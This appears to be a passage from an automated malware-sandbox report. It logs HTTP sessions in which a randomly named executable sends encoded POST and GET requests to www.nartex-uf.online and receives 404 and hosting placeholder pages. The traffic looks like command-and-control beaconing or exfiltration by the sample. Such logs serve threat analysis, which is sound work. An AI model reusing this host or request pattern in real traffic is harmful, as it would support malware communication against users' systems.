                                                      Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 63 85 5f ba 7e 60 39 37 bc 67 c2 bf cd d9 ca 70 8c 1b d3 eb 02 74 d3 98 bf 7d b3 32 03 a3 33 5b 1a 9e 6f 06 7a f7 df 7f fd 7e 30 ea 86 77 1d 63 65 ea dd 5b cb bc 5b bb 5e 00 f8 5d 27 30 1d 28 75 67 cd 83 a5 3e 37 6f ad 99 39 20 3f 38 cb b1 02 cb b0 07 fe cc b0 4d 5d cc 82 f0 dc 6b 37 f0 53 00 1c d7 72 e6 e6 47 28 15 58 81 6d be fd e7 ff f1 3f ff b7 ff f9 bf fe f3 bf fe f9 ff fe f3 ff fe 9f ff fb 3f ff ab 03 17 ff e3 d4 b9 f6 d7 53 b8 fa af 7f fe 3f ff fc bf fe f9 3f f0 ea cd 19 [TRUNCATED]
                                                      Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrvc_~`97gpt}23[oz~0wce[[^]'0(ug>7o9 ?8M]k7SrG(Xm??S??m2w=| w3W+wMnla~>]7o|B<U],/rsf:&n*lwOz>m~S-LfY9S2& |=]YYKYa4NcGXD)tCe"JPG3oLbzm>xOeXLw+zExPomx0:u&w"^W{78YZl@a-HC]f|= ul)\x*ht6,k^e`Lvk@eps L5h&kq?;[,LUiL6%Im"E5]c_0wZTvk,D#eMm/POD&p^IVjRUBCIHr]AuHw^Ch"#<,vE+4>R-Ou91rQ [TRUNCATED]
                                                      Nov 25, 2024 13:55:34.693737984 CET1236INData Raw: 15 b2 4d 6b 3c 81 d4 b6 93 a9 46 a3 d6 35 26 9d 4c d2 a1 ef 31 f0 03 03 cc 94 b0 89 23 61 8f 89 aa 31 fc 44 6c a2 e9 2d 3d 7c 35 21 91 0d f2 83 d8 62 36 98 bb 03 c2 95 01 82 a7 02 bf 8b f0 18 7c 6c 86 c4 36 5d 67 20 aa 14 74 63 72 d9 a0 16 89 4c
                                                      Data Ascii: Mk<F5&L1#a1Dl-=|5!b6|l6]g tcrLcM$vahBZ(13%8Kd%5&A2dl[:J,A<~,1Y.0=D]U9FTTs5L@O)fG:RvWaIEzUe9
                                                      Nov 25, 2024 13:55:34.693749905 CET448INData Raw: 8d f2 b0 0d 75 36 39 b5 be f3 36 b9 28 48 32 93 51 6e df 7c 12 06 b9 5d b2 01 75 b7 31 5e 56 6b 7f 43 3c c3 8a 27 37 c2 23 ec cf 6b 80 37 ec 87 a8 e9 07 34 bc 33 7c 78 6a a3 db 3e ee f6 6c 36 43 b7 61 1f 84 0d 3f 9c a1 9d 61 c2 d3 1b d9 11 fa 67
                                                      Data Ascii: u696(H2Qn|]u1^VkC<'7#k743|xj>l6Ca?ag6BCYV<Qfa_$?!36Fn<^a_?e?18lb=3N_g>$g!\k$gTi<G,5\i]r#tQ\-
                                                      Nov 25, 2024 13:55:34.693878889 CET1236INData Raw: c2 48 29 ad 9f 25 57 36 94 a1 76 5d 59 38 47 33 c5 57 59 3a 43 b8 bc 50 cc 21 3b e1 50 cc f4 1c c3 7e 48 a5 16 b2 56 c6 8d 39 d9 78 76 af 8b 39 6a 27 e4 f7 99 7f 7b f3 fa e3 ca 9e 46 09 67 37 c1 62 30 e2 be 96 bf 83 07 1d 78 e0 f8 fa 2b 4c 61 3b
                                                      Data Ascii: H)%W6v]Y8G3WY:CP!;P~HV9xv9j'{Fg7b0x+La;9;dn$A<JGcUf%!?;6egakIVEUgk, 4yMxMv>$RB":p(y4*agqr/s4HZ09Jdf,7Ks
                                                      Nov 25, 2024 13:55:34.693892002 CET1236INData Raw: 2d cf 66 d2 ef 36 e5 d8 4c fa 4c 62 a1 b6 d9 f0 0b d6 74 26 ef fb 33 5a f5 49 e6 d4 03 5a f6 a5 c4 3d a3 75 cf 44 24 9b 85 9f 27 ed 99 ac 7c 26 8a 9a 59 fa a5 94 3d b9 b5 5f 49 18 bb c5 cf c4 1b 26 ab 3f cf 92 e7 b5 fc 4b 5b f3 6c d6 3f 13 97 19
                                                      Data Ascii: -f6LLbt&3ZIZ=uD$'|&Y=_I&?K[l?<e0(6{. =W;weYK8&Ix{Mlcs(oyl"Q?yS/v_(%Y7_l}/R~ZLa)y@=F=
                                                      Nov 25, 2024 13:55:34.693909883 CET448INData Raw: d4 30 48 4a cb 5c 41 1f ad 1e 6c 33 00 db 89 80 a1 af 01 25 ab 20 ed 16 63 aa 55 54 0a f3 00 5f 91 9b 7e 37 6e ab 37 05 27 b0 8d 95 bb 71 c8 9b 3b 63 64 66 fa 75 41 e3 d6 cb c3 a5 6a 30 fd 76 65 c0 02 9d 56 ce 85 74 0c 82 86 fa b6 95 4d 95 da 36
                                                      Data Ascii: 0HJ\Al3% cUT_~7n7'q;cdfuAj0veVtM65qko3U`aR2J-)_>*d|)e@5jT(^kvZm}).x,47h;%"9&a}{yivr&1D-Jk(U'|OUF!/zr
                                                      Nov 25, 2024 13:55:34.694637060 CET1236INData Raw: 28 d7 ea f0 7d c9 e1 ca 05 97 7f 40 a4 38 37 8d a4 96 17 99 f7 a0 17 81 0e 80 0b 2b 17 7a 3b ff da d9 d4 6a 71 36 66 1b 5e 90 90 6a 64 74 e1 6c 92 1b 4f 24 94 dc f6 8c ed 27 d0 de 66 0b e1 a5 dd 59 e7 b7 ef 5a 06 df 0f 20 fb 02 d9 9e 0d 2e f4 0d
                                                      Data Ascii: (}@87+z;jq6f^jdtlO$'fYZ .Q*0xC{0K7{Re9]*FEe,qqu(mmY@Ji&E;7WE#wBYwAxU|1s;t`3,@FBRzlsXH,
                                                      Nov 25, 2024 13:55:34.694653988 CET1236INData Raw: 50 d6 da b1 62 08 d7 d5 94 c6 55 9b f1 36 ae 56 c9 61 43 36 e6 33 61 37 de 6a 3e 8f d4 b1 6c cc 9a b7 7c 27 b7 e3 9a b5 3c af 60 5c f6 45 2c f4 15 2b d3 62 ed f0 0d 2d 25 55 d9 18 4d cb 56 72 d7 1c 99 d7 8b a2 40 94 63 88 a8 9c d4 a1 4a 78 51 89
                                                      Data Ascii: PbU6VaC63a7j>l|'<`\E,+b-%UMVr@cJxQ0IKYii,dDbb0J<wfhq-$S(z1qoRRPE\T5b~vZp!71U?:vg{("4Y}Pb^. Cn
                                                      Nov 25, 2024 13:55:34.694665909 CET448INData Raw: 21 9d 2b 79 4a 79 92 50 45 de 6c dc 9d 1b 81 31 21 81 aa 33 ff f6 e6 f5 c7 95 3d 45 db da 37 03 7d 13 2c 06 23 ee 6b f9 3b 78 d0 21 ed d4 5f 89 b2 2c bd ea 50 6a f4 57 92 a8 bd ea 80 1d 6f eb af 50 db bc ea 40 75 c7 d7 5f 2d 83 60 3d 39 3b bb bb
                                                      Data Ascii: !+yJyPEl1!3=E7},#k;x!_,PjWoP@u_-`=9;dn$Awqm\*&v<xq8yI:#~4L5~_*wE^U^4RjyY1TyUD3w$_c^beZGxi8k/(^h42W^"U|aS
                                                      Nov 25, 2024 13:55:34.694766998 CET1236INData Raw: 70 56 12 c9 4d 65 90 14 50 80 ad d0 f2 11 72 55 54 29 53 45 75 a0 80 44 84 97 22 ca 0d f0 10 f8 2c 03 61 32 b6 7a 0c 02 a0 02 23 c6 44 78 46 82 9c e6 e8 3b f9 9d f6 ee fb 22 47 65 94 9e 61 67 34 82 66 cd 06 40 81 4c 7a 0b f8 2a 2a 80 62 00 5d 34
                                                      Data Ascii: pVMePrUT)SEuD",a2z#DxF;"Geag4f@Lz**b]4G"( l PNF2@A0<K:<!P3 @'P4h!(,70P ]WqI[0t8!--Q.[70D48f#c6p~]
                                                      Nov 25, 2024 13:55:34.813967943 CET1236INData Raw: c2 0c ad 8d 46 49 fb d0 32 42 e3 1d d8 39 52 6f 65 f4 37 46 3f 48 22 1a 51 7f 93 c0 f4 50 e4 b0 ec f0 16 5c 12 71 3c fc 01 4c e6 f1 70 74 3b 06 13 43 53 7e a0 70 a0 b7 55 7e ac 0d 7f 10 6e c1 a6 06 2b 41 f9 33 f4 1d 78 78 b2 fc 83 a8 01 03 55 68
                                                      Data Ascii: FI2B9Roe7F?H"QP\q<Lpt;CS~pU~n+A3xxUh?KIUNSM@?Hm`PET65*l@GA>+Eo6?Cz0,?f_u+]x;X@]!u>CXc


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      3192.168.2.54985531.31.196.177801992C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 25, 2024 13:55:35.955215931 CET1728OUTPOST /9ul0/ HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.nartex-uf.online
                                                      Origin: http://www.nartex-uf.online
                                                      Referer: http://www.nartex-uf.online/9ul0/
                                                      Cache-Control: max-age=0
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Content-Length: 1245
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                      Data Raw: 5a 76 75 70 75 34 34 70 3d 79 2b 4d 38 68 6c 52 67 59 6e 6c 63 67 4c 65 63 76 67 72 68 46 46 66 56 4f 6a 2f 79 67 77 33 37 52 7a 64 65 4f 44 6f 4f 78 6f 48 61 41 54 4e 41 55 58 35 42 63 56 49 6b 54 5a 69 32 78 65 35 67 37 68 77 33 72 77 7a 4a 65 6a 42 72 6d 4e 4d 38 6f 68 4e 2f 53 69 63 43 4f 53 47 65 31 4c 44 71 41 35 45 47 5a 58 52 6a 31 54 41 4a 4d 45 4c 61 55 30 4f 48 77 30 78 6f 76 61 56 6d 59 44 74 4c 57 42 62 53 6b 66 54 75 35 33 71 30 43 55 45 66 7a 33 6a 42 68 75 4f 4c 31 57 48 72 6b 33 44 59 30 61 39 67 6d 4a 52 67 52 6e 64 43 68 77 47 74 6c 70 43 71 7a 41 42 6f 58 64 6c 74 70 34 63 35 41 65 78 52 30 66 73 41 48 61 62 71 44 6f 66 47 6c 31 62 36 55 66 49 53 6c 34 6d 66 62 45 32 67 65 2b 4d 6d 4d 4f 65 55 71 32 61 44 53 47 69 43 63 76 59 6f 78 49 78 35 45 67 71 32 78 49 4d 4e 33 36 6b 61 50 51 36 46 4c 5a 6d 65 67 4b 74 62 78 45 50 77 4d 45 50 47 2f 55 6c 4f 61 50 52 31 34 30 6a 73 47 73 2f 6d 65 36 41 41 61 76 4d 2b 6a 49 4f 54 7a 52 50 6f 4b 62 37 47 31 2f 34 52 64 30 4b 61 4c 32 30 41 72 [TRUNCATED]
                                                      Data Ascii: Zvupu44p=y+M8hlRgYnlcgLecvgrhFFfVOj/ygw37RzdeODoOxoHaATNAUX5BcVIkTZi2xe5g7hw3rwzJejBrmNM8ohN/SicCOSGe1LDqA5EGZXRj1TAJMELaU0OHw0xovaVmYDtLWBbSkfTu53q0CUEfz3jBhuOL1WHrk3DY0a9gmJRgRndChwGtlpCqzABoXdltp4c5AexR0fsAHabqDofGl1b6UfISl4mfbE2ge+MmMOeUq2aDSGiCcvYoxIx5Egq2xIMN36kaPQ6FLZmegKtbxEPwMEPG/UlOaPR140jsGs/me6AAavM+jIOTzRPoKb7G1/4Rd0KaL20Arfr0wk5DaxBUOI//kCKA8uzDH9AvnCHA6ANTGYxb9yugeAhKqgIfadXRFRmEa0rqy8sAnyXtFlriXA9L2/qQQURAQ0nqWu34L7QLUY3edT+A5R8vEFdK866gVvsssTP4exVpHe+MBMZQNBlHupavRH22axfRvq5NTTPZhhSIfeKi6BkQuQRf1vKm/54IKubUbIobffK9xXoSV/YV5CVbnrMh51p8tdJ2J4BVGTkwtfLK/Q62+ixxR8bVhxYniUJQ0ZdVdZprvYdrufCXxss2K1DIk2XWpnmOSZxb/uGw7KA5iByWL2D+yCkJnBgOpJ+YLIMhhXhsZ6MvjjHOpI75xBX9E2ypfIO4+oc4UspcyENOR8SVr82s1RT9Hyd7p/zms3ygr3cymXPbb8cuOh0QyFcSYKrVjgN2is5QgU/I0RDdaUSXx1eRjaJ4OAQtEmad8oGb0MfAvA1vqImwAp5ofw+ZbgIX8m3e1swIu3FKa++L7lkXd3QhcoSAn+NycmmUHT8SQUXpAQ4N+bRFdJEIm7XxHl1wvjIij33bveenm/lb6iTh7BuujlJPJmIJXMzTHDOLkUojQMnmMiLbZtgMOE68fKUYyI4q0Fq5qMDIumjEaVtSgatlTxCSQ06ddM4YIintF4rwWLeGzuQnC05ubQwwxWw/cMzwZ79 [TRUNCATED]
                                                      Nov 25, 2024 13:55:37.394146919 CET1236INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Mon, 25 Nov 2024 12:55:37 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Content-Encoding: gzip
                                                      Data Raw: 63 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bd 5b 73 e3 46 b2 30 f8 ee 5f 41 f1 84 d5 a4 1b 84 70 e7 ad d1 1a 8f a7 7d ec 38 33 b6 63 da 67 26 36 34 0a 05 44 82 22 dc 20 c0 03 80 52 cb 12 4f 6c ec c3 fe 8f 7d dc b7 f3 b0 5f c4 ee c3 be ec 2f 98 ef 1f 6d 66 15 ee 37 16 08 52 ea ee 23 d9 4d 82 40 55 66 65 56 56 56 66 56 55 e2 cd c9 dc 9d 05 f7 6b b3 b3 0c 56 f6 db 37 f8 d9 b1 0d e7 46 ef 7a 9b 6e 67 66 1b be af 77 2d ff ca 98 1b eb c0 ba 35 bb 9d b9 11 18 83 b5 e1 98 f6 60 e3 d9 7a 77 19 04 6b 7f 72 76 e6 9b de ad e9 89 63 85 5f ba 7e 60 39 37 bc 67 c2 bf cd d9 ca 70 8c 1b d3 eb 02 74 d3 98 bf 7d b3 32 03 a3 33 5b 1a 9e 6f 06 7a f7 df 7f fd 7e 30 ea 86 77 1d 63 65 ea dd 5b cb bc 5b bb 5e 00 f8 5d 27 30 1d 28 75 67 cd 83 a5 3e 37 6f ad 99 39 20 3f 38 cb b1 02 cb b0 07 fe cc b0 4d 5d cc 82 f0 dc 6b 37 f0 53 00 1c d7 72 e6 e6 47 28 15 58 81 6d be fd e7 ff f1 3f ff b7 ff f9 bf fe f3 bf fe f9 ff fe f3 ff fe 9f ff fb 3f ff ab 03 17 ff e3 d4 b9 f6 d7 53 b8 fa af 7f fe 3f ff fc bf fe f9 3f f0 ea cd 19 [TRUNCATED]
                                                      Data Ascii: c000[sF0_Ap}83cg&64D" ROl}_/mf7R#M@UfeVVVfVUkV7Fzngfw-5`zwkrvc_~`97gpt}23[oz~0wce[[^]'0(ug>7o9 ?8M]k7SrG(Xm??S??m2w=| w3W+wMnla~>]7o|B<U],/rsf:&n*lwOz>m~S-LfY9S2& |=]YYKYa4NcGXD)tCe"JPG3oLbzm>xOeXLw+zExPomx0:u&w"^W{78YZl@a-HC]f|= ul)\x*ht6,k^e`Lvk@eps L5h&kq?;[,LUiL6%Im"E5]c_0wZTvk,D#eMm/POD&p^IVjRUBCIHr]AuHw^Ch"#<,vE+4>R-Ou91rQ [TRUNCATED]
                                                      Nov 25, 2024 13:55:37.394174099 CET1236INData Raw: 15 b2 4d 6b 3c 81 d4 b6 93 a9 46 a3 d6 35 26 9d 4c d2 a1 ef 31 f0 03 03 cc 94 b0 89 23 61 8f 89 aa 31 fc 44 6c a2 e9 2d 3d 7c 35 21 91 0d f2 83 d8 62 36 98 bb 03 c2 95 01 82 a7 02 bf 8b f0 18 7c 6c 86 c4 36 5d 67 20 aa 14 74 63 72 d9 a0 16 89 4c
                                                      Data Ascii: Mk<F5&L1#a1Dl-=|5!b6|l6]g tcrLcM$vahBZ(13%8Kd%5&A2dl[:J,A<~,1Y.0=D]U9FTTs5L@O)fG:RvWaIEzUe9
                                                      Nov 25, 2024 13:55:37.394185066 CET448INData Raw: 8d f2 b0 0d 75 36 39 b5 be f3 36 b9 28 48 32 93 51 6e df 7c 12 06 b9 5d b2 01 75 b7 31 5e 56 6b 7f 43 3c c3 8a 27 37 c2 23 ec cf 6b 80 37 ec 87 a8 e9 07 34 bc 33 7c 78 6a a3 db 3e ee f6 6c 36 43 b7 61 1f 84 0d 3f 9c a1 9d 61 c2 d3 1b d9 11 fa 67
                                                      Data Ascii: u696(H2Qn|]u1^VkC<'7#k743|xj>l6Ca?ag6BCYV<Qfa_$?!36Fn<^a_?e?18lb=3N_g>$g!\k$gTi<G,5\i]r#tQ\-
                                                      Nov 25, 2024 13:55:37.394303083 CET1236INData Raw: c2 48 29 ad 9f 25 57 36 94 a1 76 5d 59 38 47 33 c5 57 59 3a 43 b8 bc 50 cc 21 3b e1 50 cc f4 1c c3 7e 48 a5 16 b2 56 c6 8d 39 d9 78 76 af 8b 39 6a 27 e4 f7 99 7f 7b f3 fa e3 ca 9e 46 09 67 37 c1 62 30 e2 be 96 bf 83 07 1d 78 e0 f8 fa 2b 4c 61 3b
                                                      Data Ascii: H)%W6v]Y8G3WY:CP!;P~HV9xv9j'{Fg7b0x+La;9;dn$A<JGcUf%!?;6egakIVEUgk, 4yMxMv>$RB":p(y4*agqr/s4HZ09Jdf,7Ks
                                                      Nov 25, 2024 13:55:37.394316912 CET224INData Raw: 2d cf 66 d2 ef 36 e5 d8 4c fa 4c 62 a1 b6 d9 f0 0b d6 74 26 ef fb 33 5a f5 49 e6 d4 03 5a f6 a5 c4 3d a3 75 cf 44 24 9b 85 9f 27 ed 99 ac 7c 26 8a 9a 59 fa a5 94 3d b9 b5 5f 49 18 bb c5 cf c4 1b 26 ab 3f cf 92 e7 b5 fc 4b 5b f3 6c d6 3f 13 97 19
                                                      Data Ascii: -f6LLbt&3ZIZ=uD$'|&Y=_I&?K[l?<e0(6{. =W;weYK8&Ix{Mlcs(oyl"Q?yS/v_(%Y7_l}/R~ZLa)y
                                                      Nov 25, 2024 13:55:37.394367933 CET1236INData Raw: 40 87 f3 17 f2 94 3d df 46 a0 c3 fb 0b e5 b4 3d e7 86 a0 03 fa 0b 05 e2 9e 6f 63 d0 11 fc 85 52 ea 9e 77 83 d0 01 fd 85 3c 75 cf b8 51 e8 08 fe 42 29 75 cf bb 61 68 7f 7f 81 d1 48 63 dc 38 f4 69 f9 0b e5 ed 79 c6 0d 44 87 f3 17 42 d2 12 7f 21 2e
                                                      Data Ascii: @=F=ocRw<uQB)uahHc8iyDB!.fJ'?bu=HAaJ?Qd/)I-IQ'3=xaJ/)4OYPRlpf_yzBIW-Jbn^:)?RpxcG$=!0l
                                                      Nov 25, 2024 13:55:37.394380093 CET224INData Raw: c9 21 e4 2f c3 10 f8 b4 e7 fb 12 83 fe 7a 03 72 e9 c4 17 5f da b4 4e 66 6f 4a da 43 fc 92 ec ec 5b b1 cb 27 07 c6 f9 3b 1a de 9e 01 52 ed 13 ad 97 5b 76 39 c8 fb 35 a7 c9 32 7e 71 36 8a c3 54 20 39 a0 e7 49 54 81 b6 97 04 a7 4a ee fa c5 9b 85 1b
                                                      Data Ascii: !/zr_NfoJC[';R[v952~q6T 9ITJG8e*c>Jk\[oc~sUZs/I~4|s`9w$`.{#I+?0<y;tn.0'~+H{RE'Q)\XpU<?/
                                                      Nov 25, 2024 13:55:37.394406080 CET1236INData Raw: 28 d7 ea f0 7d c9 e1 ca 05 97 7f 40 a4 38 37 8d a4 96 17 99 f7 a0 17 81 0e 80 0b 2b 17 7a 3b ff da d9 d4 6a 71 36 66 1b 5e 90 90 6a 64 74 e1 6c 92 1b 4f 24 94 dc f6 8c ed 27 d0 de 66 0b e1 a5 dd 59 e7 b7 ef 5a 06 df 0f 20 fb 02 d9 9e 0d 2e f4 0d
                                                      Data Ascii: (}@87+z;jq6f^jdtlO$'fYZ .Q*0xC{0K7{Re9]*FEe,qqu(mmY@Ji&E;7WE#wBYwAxU|1s;t`3,@FBRzlsXH,
                                                      Nov 25, 2024 13:55:37.394479990 CET224INData Raw: 50 d6 da b1 62 08 d7 d5 94 c6 55 9b f1 36 ae 56 c9 61 43 36 e6 33 61 37 de 6a 3e 8f d4 b1 6c cc 9a b7 7c 27 b7 e3 9a b5 3c af 60 5c f6 45 2c f4 15 2b d3 62 ed f0 0d 2d 25 55 d9 18 4d cb 56 72 d7 1c 99 d7 8b a2 40 94 63 88 a8 9c d4 a1 4a 78 51 89
                                                      Data Ascii: PbU6VaC63a7j>l|'<`\E,+b-%UMVr@cJxQ0IKYii,dDbb0J<wfhq-$S(z1qoRRPE\T5b~vZp!71U?:vg{("4Y}P
                                                      Nov 25, 2024 13:55:37.394495964 CET1236INData Raw: fa a3 e6 1f 62 5e d8 2e 98 01 8b 20 db 06 98 43 6e cc 09 1a e4 86 37 b8 c1 84 34 a6 13 f4 c6 c2 dc bc e1 bc 9b 6b a3 27 a9 2a 17 fd e3 c5 3e 17 0e 84 fe 0e 85 b1 a3 09 7b aa af e3 12 46 46 66 25 61 b5 d3 6b 85 76 88 b3 e7 94 e9 5d 43 96 e5 a2 e1
                                                      Data Ascii: b^. Cn74k'*>{FFf%akv]CWaY}JMMs$m-bd,/L#u}D)l(f,v=+<Gije8Z.UiV9Z#)h%,X[XWf"*^X^',\S)L
                                                      Nov 25, 2024 13:55:37.514667034 CET1236INData Raw: 34 1e f0 32 80 57 e5 11 5e 88 22 af 0d 55 7c 61 19 14 53 00 9c 32 1a 86 d7 f8 39 1a 21 6c 91 1f 0a d2 00 9e 69 23 72 77 2c 0d 92 22 63 69 39 d0 86 bc 22 48 33 d0 43 b2 04 35 06 50 43 51 47 03 15 ca 28 d1 0f fc 1a 29 06 7e 0d 87 9d f0 4b e8 08 e2
                                                      Data Ascii: 42W^"U|aS29!li#rw,"ci9"H3C5PCQG()~K%U=%{{EQH51DNxd,<pf6HrXA`{T#9aHOlp#g+/dH&WPF(@9+*pVMePrUT)S


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.54986131.31.196.177801992C:\Program Files (x86)\qgNvKFZijGVkcEEPSgzrvAetYjwdrgHDFEvmGJpEGoeV\hnmibsTvfR.exe
                                                      TimestampBytes transferredDirectionData
                                                      Nov 25, 2024 13:55:38.607235909 CET428OUTGET /9ul0/?Zvupu44p=/8kciQFlGVV+s671hjTEMgvePijKoQKbVww8Emk+/ImbSDpFBlkIfEUbLp7Rr+tD2T8CwWTvaBp6p+1LgixmeUAbCHLl0Y/2eq8XbxFkjwUJTy71Wn7hwUVQgvRbUyIDUA==&RhqLA=IdOhgVq HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.5
                                                      Host: www.nartex-uf.online
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0,gzip(gfe)
                                                      Nov 25, 2024 13:55:39.996143103 CET1236INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Mon, 25 Nov 2024 12:55:39 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Vary: Accept-Encoding
                                                      Data Raw: 66 65 62 31 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 64 61 74 61 2d 70 61 6e 65 6c 2d 75 72 6c 3d 22 68 74 74 70 73 3a 2f 2f 73 65 72 76 65 72 31 39 34 2e 68 6f 73 74 69 6e 67 2e 72 65 67 2e 72 75 2f 6d 61 6e 61 67 65 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e d0 a1 d1 82 d1 80 d0 b0 d0 bd d0 b8 d1 86 d0 b0 20 d0 bd d0 b5 26 6e 62 73 70 3b d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd d0 b0 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6d 65 64 69 61 3d 22 61 6c 6c 22 3e 2f 2a 21 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a [TRUNCATED]
                                                      Data Ascii: feb1<!doctype html><html lang="ru" class="is_adaptive" data-panel-url="https://server194.hosting.reg.ru/manager"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title> &nbsp;</title><style media="all">/*!*************************************************************************************************************************************************************************************************!*\ !*** css ./node_modules/css-loader/index.js??clonedRuleSet-6.use[1]!./node_modules/postcss-loader/src/index.js!./node_modules/less-loader/dist/cjs.js!./bem/blocks.adaptive/b-page/b-page.less ***! \*************************************************************************************************************************************************************************************************/.b-page{display:flex;flex-direction:column;width:100%;min-width:320px;height:100%;padding:57p [TRUNCATED]
                                                      Nov 25, 2024 13:55:39.996201992 CET1236INData Raw: 70 78 20 49 6e 74 65 72 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 48 65 6c 76 65 74 69 63 61 2c 46 72 65 65 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 2d 77 65 62 6b 69
                                                      Data Ascii: px Inter,Arial,Helvetica Neue,Helvetica,FreeSans,sans-serif;background:#fff;-webkit-tap-highlight-color:transparent}html:not(.is_adaptive) .b-page{overflow-x:hidden}@media (min-width:1024px){.is_adaptive .b-page{overflow-x:hidden}}.b-page_type
                                                      Nov 25, 2024 13:55:39.996253014 CET448INData Raw: 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 31 30 32 34 70 78 29 7b 2e 69 73 5f 61 64 61 70 74 69 76 65 20 2e 62 2d 70 61 67 65 5f 6d 6f 62 69 6c 65 2d 6f 76 65 72 66 6c 6f 77 5f 68 69 64 64 65 6e 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65
                                                      Data Ascii: ia (min-width:1024px){.is_adaptive .b-page_mobile-overflow_hidden{overflow:visible}}.ie .b-page{display:block}.b-page__footer-down{flex:1 0 auto;overflow:hidden}.ie .b-page__footer-down{min-height:100%}@media (min-width:1024px){.is_adaptive .b
                                                      Nov 25, 2024 13:55:39.996268988 CET1236INData Raw: 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 7d 2e 62 2d 70 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 77 72 61 70 70 65 72 5f 73 74 79 6c 65 5f 69 6e 64 65 6e 74 7b 70 61 64 64 69 6e 67
                                                      Data Ascii: -page__content-wrapper{margin:0 auto}.b-page__content-wrapper_style_indent{padding-right:24px;padding-left:24px}.b-page__content-wrapper_style_indent_new{padding-right:48px;padding-left:48px}html:not(.is_adaptive) .b-page__content-wrapper{widt
                                                      Nov 25, 2024 13:55:39.996361971 CET1236INData Raw: 2d 73 65 72 69 66 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 35 38 70 78 7d 2e 62 2d 70 61 67 65 5f 5f 61 64 64 69 74 69 6f 6e 2d 74 69 74 6c 65 2d 6c 69 6e 6b 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 62 2d 70 61 67 65 5f
                                                      Data Ascii: -serif;line-height:58px}.b-page__addition-title-link{text-decoration:none}.b-page__addition-title-link:hover{text-decoration:underline}.b-page__addition-title .b-title{display:inline}.b-page__addition-item{position:relative;float:right;padding
                                                      Nov 25, 2024 13:55:39.996378899 CET448INData Raw: 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a
